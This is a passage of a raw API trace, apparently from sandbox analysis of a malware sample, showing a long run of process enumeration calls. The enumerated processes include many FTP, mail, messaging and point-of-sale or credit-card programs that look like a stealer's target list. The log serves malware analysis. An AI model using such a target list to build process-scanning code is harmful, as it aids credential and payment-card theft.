pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.237] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.238] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.240] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.278] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.320] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.321] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.323] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.324] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.326] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.328] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.329] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.331] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0214.333] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.334] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0214.336] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.338] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0214.340] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0214.342] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0214.343] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0214.346] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0214.349] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0214.351] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.353] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.354] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0214.430] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.432] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.434] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.435] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.437] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0214.439] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0214.441] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0214.442] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0214.444] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0214.446] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0214.447] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0214.449] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0214.451] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0214.453] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0214.455] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0214.457] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0214.460] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0214.462] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0214.464] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0214.513] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0214.515] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0214.518] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0214.520] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0214.523] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0214.526] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0214.529] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0214.532] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0214.535] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0214.538] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0214.542] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0214.545] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0214.548] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0214.553] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0214.557] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0214.559] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0214.562] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0214.564] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0214.566] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0214.569] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0214.571] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0214.573] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0214.575] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0214.577] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0214.580] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0214.582] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0214.585] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0214.592] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0214.595] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0214.598] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0214.601] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0214.603] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0214.606] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0214.610] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0214.614] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0214.617] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0214.620] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0214.623] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0214.625] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0214.628] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0214.636] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0214.639] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 